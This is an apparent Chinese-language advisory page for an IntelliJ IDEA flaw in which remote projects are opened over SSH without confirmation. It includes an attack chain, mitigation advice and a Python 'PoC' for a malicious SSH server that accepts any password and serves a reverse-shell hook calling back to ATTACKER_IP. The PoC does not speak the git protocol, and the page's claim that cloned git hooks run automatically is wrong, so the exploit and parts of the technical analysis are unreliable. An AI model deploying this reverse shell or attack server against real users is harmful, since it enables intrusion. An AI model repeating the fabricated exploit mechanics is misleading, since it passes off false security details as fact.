CVE-2025-68269: JetBrains IntelliJ IDEA SSH远程项目安全绕过漏洞

漏洞信息

漏洞编号

CVE-2025-68269

漏洞类型

安全绕过/安全确认缺失

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

JetBrains IntelliJ IDEA

漏洞概述

CVE-2025-68269是JetBrains IntelliJ IDEA中的一个安全漏洞，存在于2025.3之前的版本。该漏洞允许攻击者通过SSH协议在用户未收到适当确认提示的情况下，诱骗用户打开不受信任的远程项目。攻击者可以利用此漏洞在受害者的IDE环境中执行恶意代码或窃取敏感信息。由于CVSS评分为5.4（中等），该漏洞需要用户交互才能成功利用，但仍然对使用IntelliJ IDEA的开发人员构成安全风险。攻击者可能通过构造恶意的SSH连接或项目配置，绕过安全确认机制，直接在用户系统上执行任意代码或访问本地文件系统。此漏洞影响所有使用受影响版本IntelliJ IDEA的用户，特别是在处理远程项目或使用SSH功能时。JetBrains已于2025.3版本中修复此问题，添加了必要的确认提示以防止未经授权的远程项目打开操作。

技术细节

该漏洞存在于IntelliJ IDEA处理SSH远程项目的逻辑中。当用户尝试打开通过SSH协议托管的远程项目时，IDE应该向用户显示安全确认对话框，让用户明确选择是否信任并打开该项目。然而，在受影响版本中（2025.3之前），这个确认机制被绕过或缺失，导致恶意SSH服务器可以自动执行代码或脚本。攻击者可以搭建一个恶意的SSH服务器，配置特定的git仓库或项目文件，当受害者使用IntelliJ IDEA的SSH功能连接时，系统会自动克隆并打开这些恶意项目。攻击者可以在项目中植入恶意的构建脚本、插件或配置文件，这些文件在项目打开时会被自动执行。此外，攻击者还可以利用IDE的自动补全、代码高亮等功能触发恶意代码执行。由于IntelliJ IDEA具有广泛的插件生态系统和自动化功能，攻击者有多种途径可以实现代码执行或数据窃取。CVSS向量显示该漏洞需要网络攻击（AV:N）、低复杂度（AC:L）、无需认证（PR:N）但需要用户交互（UI:R），影响低程度的机密性（C:L）和完整性（I:L）。

攻击链分析

STEP 1

步骤1

攻击者搭建恶意SSH服务器，配置包含恶意git hooks或脚本的仓库

STEP 2

步骤2

攻击者诱骗受害者使用IntelliJ IDEA（<2025.3版本）通过SSH连接到恶意服务器

STEP 3

步骤3

受害者的IntelliJ IDEA自动克隆远程项目，由于缺少确认提示，不会警告用户

STEP 4

步骤4

项目中的恶意git hooks（如post-checkout、post-commit）或构建脚本在IDE中自动执行

STEP 5

步骤5

攻击者获得受害者系统的代码执行权限，可窃取敏感信息、安装后门或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68269 PoC - Malicious SSH Server Configuration
# This PoC demonstrates how an attacker could exploit the missing confirmation
# when opening untrusted remote projects over SSH in IntelliJ IDEA

import socket
import threading
import paramiko
import os
import base64

# Generate host key for SSH server
host_key = paramiko.RSAKey.generate(2048)

def handle_client(client_socket, address):
    """Handle incoming SSH connection from IntelliJ IDEA client"""
    transport = paramiko.Transport(client_socket)
    transport.add_server_key(host_key)
    
    # Start SSH server
    server = SSHServer()
    transport.start_server(server=server)
    
    # Wait for channel
    channel = transport.accept(20)
    if channel is not None:
        channel.close()

class SSHServer(paramiko.ServerInterface):
    """Malicious SSH server that serves malicious project files"""
    
    def check_auth_password(self, username, password):
        return paramiko.AUTH_SUCCESSFUL
    
    def check_channel_request(self, kind, chanid):
        return paramiko.OPEN_SUCCEEDED
    
    def check_channel_exec_request(self, channel, command):
        # When IntelliJ runs git clone, serve malicious content
        if 'git-receive-pack' in command or 'git-upload-pack' in command:
            # Serve malicious git repository with pre hooks
            malicious_repo = self.create_malicious_repo()
            channel.send(malicious_repo)
        channel.close()
        return True
    
    def create_malicious_repo(self):
        """Create a git repository with malicious post-checkout hooks"""
        # This would contain the malicious project structure
        # including .git/hooks/post-checkout with reverse shell
        return b"""#!/bin/bash
# Malicious post-checkout hook - reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
"""

def start_malicious_ssh_server():
    """Start the malicious SSH server on port 22"""
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind(('0.0.0.0', 22))
    server_socket.listen(5)
    
    print("Malicious SSH server running on port 22...")
    print("Waiting for IntelliJ IDEA clients to connect...")
    
    while True:
        client, addr = server_socket.accept()
        print(f"Connection from {addr}")
        client_thread = threading.Thread(target=handle_client, args=(client, addr))
        client_thread.start()

if __name__ == "__main__":
    start_malicious_ssh_server()

# Usage:
# 1. Attacker sets up this malicious SSH server
# 2. Victim uses IntelliJ IDEA to connect via SSH to attacker server
# 3. IntelliJ IDEA (before 2025.3) opens the project WITHOUT confirmation
# 4. Malicious hooks/scripts are executed automatically

影响范围

JetBrains IntelliJ IDEA < 2025.3

防御指南

临时缓解措施

立即升级JetBrains IntelliJ IDEA到2025.3或更高版本，该版本已修复SSH远程项目打开时的确认提示缺失问题。在等待升级期间，避免使用IntelliJ IDEA通过SSH打开来自第三方或不受信任来源的远程项目，仅连接已知可信的SSH服务器，并在连接前验证服务器身份。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68269
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68269
3 Details https://www.cvedetails.com/cve/CVE-2025-68269/
4 VulDB https://vuldb.com/cve/CVE-2025-68269
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/